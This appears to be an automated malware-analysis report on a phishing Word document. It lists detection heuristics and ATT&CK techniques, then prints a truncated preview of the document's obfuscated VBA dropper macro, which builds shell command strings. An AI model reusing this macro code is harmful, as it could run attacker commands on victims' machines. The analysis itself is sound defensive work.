Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)
The sample is an OLE document containing a VBA macro that calls the Shell() function, a critical heuristic indicating potential execution of arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure, likely using image-based content to deceive the user. The macro's obfuscation together with the Shell() call strongly suggests it is designed to download and execute a second-stage payload.
Heuristics (6)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 252,416 bytes but its declared streams total only 24,693 bytes; 227,723 bytes (90%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70141 bytes |

SHA-256 (macros.bas): 914dc1e156ed34ec3831ce430e41e9cf253ab8490a54e198707306ddfa5cedbe
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zMtYzMkCzf"
Function kkwGpHvwJU()
On Error Resume Next
iWLSSdSVKM = ("7jvUUZBkSNFMb63rwV1TVw9w8Bi8ZOQJfWcU%=^heqF3V")
qcwFzjCBK = 6276616 + YCqTDJEtXBNcij - OPIb2 / Log(EWKjDrZapQNU / Int(HaDzABwJXCWn) - 8175992 * BXvzVvcsBBwcFz) / Qnf + Hex(ACqpUmwzQbd) / (XjTnsNsYDuQr - Int(GPZCAYvzhW) - 9954873 * ChrW(6293450 / WMEZiYsMFLhNEP + aYGlwQNX - CByte(4437031 + CLng(9173937 + ChrW(3201152) - 604119 - Chr(lqJUGurjUiPs)))))
VHcIiUnp = 9912807 + BDsowIjX - OPIb2 / Log(QNiiIphd / Int(VKaPBNGKY) - 6107191 * tqtwDLT) / Qnf + Hex(HUuwOjtGYLi) / (mACXommCihmjD - Int(PZUjizVCW) - 8685373 * ChrW(5058150 / LiHHiwqo + soVJRYRAZ - CByte(6642155 + CLng(2165406 + ChrW(8879258) - 9607158 - Chr(UlohlWkiI)))))
LkzIfmkV = Mid(iWLSSdSVKM, 29, 13)
XNAwGVJ = ("tiH&set %tH58MJzi")
EfGaw = 651040 + TGbnWXHziOrVz - OPIb2 / Log(BbVLJru / Int(jXIJbCDoVKHp) - 3394640 * ZZhuViNjX) / Qnf + Hex(XiTTzFpM) / (lXEfNwFtusjNKn - Int(BwdPWPUzABmw) - 6667770 * ChrW(6995739 / QVvrfrVtUzPlS + qtMrhSDbaqiRX - CByte(785389 + CLng(5659854 + ChrW(5201481) - 9914409 - Chr(JGcLSTHufC)))))
ERtrdAFPbD = 1856561 + GiBIJIZFB - OPIb2 / Log(lovFINTRQ / Int(wtcMNfatjmmAR) - 1705253 * DQPuUBtVqUoP) / Qnf + Hex(KuaOlQSMC) / (viifWOjkXmVFz - Int(XvrEYls) - 4935883 * ChrW(2973154 / jpLXOBpXB + TPmVXGKjQdr - CByte(944770 + CLng(9333314 + ChrW(4255422) - 8303143 - Chr(YOoQwVPUwhCIW)))))
NpAUwD = Mid(XNAwGVJ, 4, 7)
wzuIa = ("7uMjPiQXWuSEHidEr0N3OwX8zFo3bdwe^r^s&&setRaR6Jd")
HSYVImMv = 9701476 + NvwvjEUDTCF - OPIb2 / Log(wnAzSihvKji / Int(LiztQQBjRMl) - 5357458 * tnDKBAZwsB) / Qnf + Hex(ibWLqCVj) / (VkAFamDB - Int(NmBYZZqilI) - 6104938 * ChrW(1780766 / TjmKptqsPrE + CJnzjPzYa - CByte(5928148 + CLng(3011758 + ChrW(2098476) - 1834178 - Chr(zUMRMAC)))))
iwwItjAAYV = 8168371 + TTQzJLdzu - OPIb2 / Log(JXQDjBtikFoRbB / Int(wVjwiDMLsTiTR) - 7739738 * wjUNAfjRj) / Qnf + Hex(SSSlcCsOJ) / (pzzQtwLY - Int(BibtXIHwNBIP) - 833186 * ChrW(67497 / MkuaPQmEIbXz + EUDTIhijrYuc - CByte(4153773 + CLng(1218162 + ChrW(5822736) - 2633159 - Chr(wlzQDIB)))))
FbiRiHoRd = Mid(wzuIa, 31, 11)
uDCBDAGo = ("f2IMjhosD73mXCl&&set %Ma0RR53MMtzf3sozYfWEbwDTXQ")
IiivC = 9922016 + lmWVMYUEoGTH - OPIb2 / Log(jYDoTsXDtTud / Int(wlbvLAUfzEb) - 7296184 * oPHdsUZ) / Qnf + Hex(strWDLbjsS) / (riZidtvSnHj - Int(cCODHvQbZE) - 1555484 * ChrW(1216587 / jZIpswHlzuWPj + jwBmOLZPToI - CByte(3819538 + CLng(7207738 + ChrW(5291135) - 8227740 - Chr(naSrtTn)))))
UBFiojKObmv = 5683114 + IZidIsnaRjfXSt - OPIb2 / Log(SUFTjYNfuwHvwp / Int(QJYrGmqmLvUs) - 3934612 * LfVjYYYOTwWvto) / Qnf + Hex(BzqljQVzbnI) / (iuYMfsljRlO - Int(RLBqbUKsCF) - 1982192 * ChrW(9666386 / HniqfutPwqT + krCIFOPiSTUOfX - CByte(1281657 + CLng(5544427 + ChrW(3102751) - 5058057 - Chr(kaiXEGslrVJ)))))
HWkPpzLwAIl = Mid(uDCBDAGo, 13, 10)
hWWPzwHznNC = ("pJB3w 8v7raMMIKFF8izsMFl&&set %nSDU")
nBdlzEVodNm = 5679940 + RmqkVAB - OPIb2 / Log(CLovBXzYzIr / Int(dufsNZlL) - 2390731 * PEnGpNDXV) / Qnf + Hex(jaNzlCWj) / (ftvwVXXGz - Int(vPpRovkHuh) - 7272331 * ChrW(4063864 / nlbDjjHKDBw + UUFSjSHGAZrq - CByte(1766007 + CLng(4815145 + ChrW(612348) - 240542 - Chr(bCbKRINtUqaqMs)))))
GwkVPaF = 2647646 + kTbioLOiPbNtl - OPIb2 / Log(HdFPbwWVCLsZPc / Int(PnhdzYFbWGQo) - 9416433 * qvTIZiwkwQPUOQ) / Qnf + Hex(mOwlzzofQ) / (VCBjJLKZaMQZ - Int(pukiqROiJ) - 7899491 * ChrW(2230022 / rTCzwBPCWEfu + nEEuoDz - CByte(2535133 + CLng(9488965 + ChrW(1288483) - 8270443 - Chr(UzNBGLNqz)))))
tiYYtltftwI = Mid(hWWPzwHznNC, 24, 10)
OsNGuPFu = ("oIkDBwVb0tKQmA7FZ6ZaZdIFHis0niFjnib%=p&cwIkhD")
MThCkI = 1261976 + KWPCcUuBd - OPIb2 / Log(UHJbVuqGopBJ / Int(kbaMijVXdcCm) - 1557268 * JwzCwiCXwB) / Qnf + Hex(KYUcORMAnfa) / (HMUINrf - Int(oNXjKpnF) - 5307470 * ChrW(6216431 / fZlXIBuOL + mUriurpbZofRu - CByte(7392278 + CLng(9436701 + ChrW(34029) - 7524839 - Chr(ZiGYHSvcW)))))
NHpmfs = 7808625
... (truncated)